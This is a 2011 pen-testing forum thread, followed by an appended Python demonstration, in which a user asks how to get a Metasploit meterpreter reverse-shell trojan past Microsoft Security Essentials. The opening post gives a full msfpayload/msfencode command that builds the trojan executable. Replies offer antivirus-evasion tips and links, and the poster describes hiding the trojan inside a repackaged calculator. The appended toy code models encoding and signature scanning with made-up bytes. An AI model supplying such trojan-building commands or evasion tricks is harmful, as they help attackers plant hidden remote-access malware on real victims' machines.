The Ethical Hacker Network (EH-Net) forum, Network Pen Testing
Topic: msfencode (Read 4529 times)
acidicloop « on: November 29, 2011, 12:39:35 AM »

Hello again. I've been making some trojans with msfpayload and have been messing with msfencode. The trojan has worked great dropping the meterpreter shell; however, for the life of me I cannot get it past Microsoft Security Essentials antivirus. No matter what I do, it flags it. My code is this:

    msfpayload windows/meterpreter/reverse_tcp lhost=192.168.146.139 lport=4442 R | msfencode -e x86/shikata_ga_nai -t raw -c 10 | msfencode -e x86/call4_dword_xor -t raw -c 10 | msfencode -e x86/countdown -t exe > chucknorris.exe

I usually run an Apache server and connect to it from the XP machine and download the trojan, or I do shared folders in VM. Any tricks y'all know to bypass Security Essentials? I would think two counts of 10 apiece and shikata_ga_nai would do the trick, but alas it does not.
j0rDy « Reply #1 on: November 29, 2011, 06:59:31 AM »

Pff, this is not easy. I'd say you have two options. Now please correct me if I'm wrong, I have no experience with this whatsoever!

The first thing you could do to evade antivirus is make sure the code is different so it will not match the signature of the antivirus. You can do this by adding characters that may not be used. You can use the following parameter for this:

    -b   The list of characters to avoid: '\x00\xff'

Another option would be to obfuscate the code or to attach the code to another executable, but I don't have any examples on that.

You probably already saw this one? http://www.offensive-security.com/metasploit-unleashed/Antivirus_Bypass
ISC2 Associate, CEH, ECSA, OSCP, OSWP

earning my stripes appears to be a road i must travel alone...with a little help of EH.net
3xban « Reply #2 on: November 29, 2011, 07:25:29 AM »

I've noticed that MSE is pretty darn good at catching these customized trojans. I had it catch the PDF exploit for CoolType almost instantly. I've also had it pick up traffic from an exploited website before other AV products did (SEP, ESET, AVG). I have no idea why people would be upset with a company who designed an OS to use their own built-in AV. One would think who would know their system better than the creator of that system.

You may have to get creative with bypassing MSE.
Certs: GCWN
(@)Dewser
chrisg (Guest) « Reply #3 on: November 29, 2011, 08:13:49 AM »

Here are a couple of links that may help:

http://www.scriptjunkie.us/2011/04/why-encoding-does-not-matter-and-how-metasploit-generates-exes/

http://www.scriptjunkie.us/2011/08/custom-payloads-in-metasploit-4/

This thread from the msf mailing list:
http://mail.metasploit.com/pipermail/framework/2011-April/007630.html
cd1zz « Reply #4 on: November 29, 2011, 09:01:24 AM »

Another resource: http://schierlm.users.sourceforge.net/avevasion.html
acidicloop « Reply #5 on: November 29, 2011, 09:57:48 AM »

Thanks for the links. Glad to know it's not just my issue, lol. Now, I thought shikata_ga_nai was polymorphic? Curious why that wouldn't evade SE, unless, like the article said, SE bases it off templates. I even did a trick where I uploaded the trojan, ran iexpress and made a self-extracting executable by attaching it to calculator, so that when they closed out calc after use, it ran the meterpreter reverse_tcp. But it flagged that too, and under the properties of the trojaned calc it's even signed by Microsoft, lol.
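Added illustration, not code from this thread and not Metasploit's own encoder or template: the toy below models the two points the replies make, the `-b` bad-character option from Reply #1 and the "encoding does not matter, the EXE template gets flagged" argument behind the link in Reply #3 that the OP picks up in Reply #5. Everything in it is constructed for the demonstration: `SAMPLE_PAYLOAD` stands in for the raw stager bytes, `TEMPLATE_HEADER`/`TEMPLATE_FOOTER` for the constant bytes msfencode's `-t exe` wrapped around the payload, `additive_xor_encode` is a simplified additive-feedback XOR in the style of shikata_ga_nai (not its real decoder stub), `pick_key` is the retry loop an encoder runs to honour `-b`, and `scan` is a byte-pattern scanner with two made-up signatures. Running it shows that the encoded bytes differ on every run and no longer match a signature on the raw payload, yet the wrapped "exe" still matches a signature on the constant template, which is why re-encoding ten times changes nothing about the detection.

```python
import os
import struct

# Constructed stand-in for the raw stager bytes msfpayload would emit (not a real payload).
# It deliberately contains 0x00, the byte that -b '\x00' asks the encoder to keep out.
SAMPLE_PAYLOAD = bytes(range(0x40))

# Constructed stand-in for the fixed EXE template that msfencode -t exe wrapped the
# encoded payload in. The real template is a different, larger file; only the idea
# (constant bytes around a variable payload) is modelled here.
TEMPLATE_HEADER = b"MZ" + b"TOY-EXE-TEMPLATE-CONSTANT-STUB"
TEMPLATE_FOOTER = b"TOY-EXE-TEMPLATE-TAIL"

# Two made-up byte-pattern signatures, the kind a simple scanner matches on:
# one on the unencoded payload, one on the constant template bytes.
SIGNATURES = {
    "raw-stager-bytes": SAMPLE_PAYLOAD[8:24],
    "exe-template-stub": b"TOY-EXE-TEMPLATE-CONSTANT-STUB",
}


def _dwords(data):
    """Pad to a 4-byte multiple (0x90, NOP) and yield little-endian dwords."""
    padded = data + b"\x90" * (-len(data) % 4)
    for off in range(0, len(padded), 4):
        yield struct.unpack_from("<I", padded, off)[0]


def additive_xor_encode(payload, key):
    """Additive-feedback XOR in the style of shikata_ga_nai (simplified):
    c_i = p_i XOR k_i, then k_{i+1} = (k_i + p_i) mod 2**32.
    Every output dword depends on the random initial key, so each run differs."""
    out = bytearray()
    for p in _dwords(payload):
        out += struct.pack("<I", p ^ key)
        key = (key + p) & 0xFFFFFFFF
    return bytes(out)


def additive_xor_decode(encoded, key):
    """Inverse of additive_xor_encode; a decoder stub would do this in place at run time."""
    out = bytearray()
    for c in _dwords(encoded):
        p = c ^ key
        out += struct.pack("<I", p)
        key = (key + p) & 0xFFFFFFFF
    return bytes(out)


def pick_key(payload, badchars, tries=10000):
    """Try random keys until neither the key (which the decoder stub embeds)
    nor the encoded bytes contain a bad character: what -b '\\x00\\xff' asks for."""
    for _ in range(tries):
        key = struct.unpack("<I", os.urandom(4))[0]
        encoded = additive_xor_encode(payload, key)
        candidate = struct.pack("<I", key) + encoded
        if not any(b in candidate for b in badchars):
            return key, encoded
    raise ValueError("no key avoids the bad characters; try a different encoder")


def wrap_in_template(encoded):
    """Model of -t exe: constant template bytes around the variable encoded payload."""
    return TEMPLATE_HEADER + encoded + TEMPLATE_FOOTER


def scan(blob, signatures=SIGNATURES):
    """Toy signature scanner: sorted names of every pattern found in blob."""
    return sorted(name for name, sig in signatures.items() if sig in blob)


def demo(badchars=b"\x00\xff"):
    """Encode twice with fresh keys, wrap one result, and scan each stage."""
    key_a, enc_a = pick_key(SAMPLE_PAYLOAD, badchars)
    key_b, enc_b = pick_key(SAMPLE_PAYLOAD, badchars)
    exe = wrap_in_template(enc_a)
    decoded = additive_xor_decode(enc_a, key_a)[: len(SAMPLE_PAYLOAD)]
    return {
        "roundtrip_ok": decoded == SAMPLE_PAYLOAD,   # the stub would recover the payload
        "polymorphic": enc_a != enc_b,               # two runs, two different byte strings
        "raw": scan(SAMPLE_PAYLOAD),                 # payload signature hits
        "encoded": scan(enc_a),                      # encoding hides it
        "exe": scan(exe),                            # template signature still hits
    }


if __name__ == "__main__":
    for stage, result in demo().items():
        print(f"{stage:12} {result}")
```

The takeaway matches the thread: stacking encoders changes the payload bytes (and `-b` keeps forbidden bytes out of them), but a detection written against the constant wrapper, or against the decoder stub itself, is untouched by any number of `-c` iterations.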
© 2013 The Ethical Hacker Network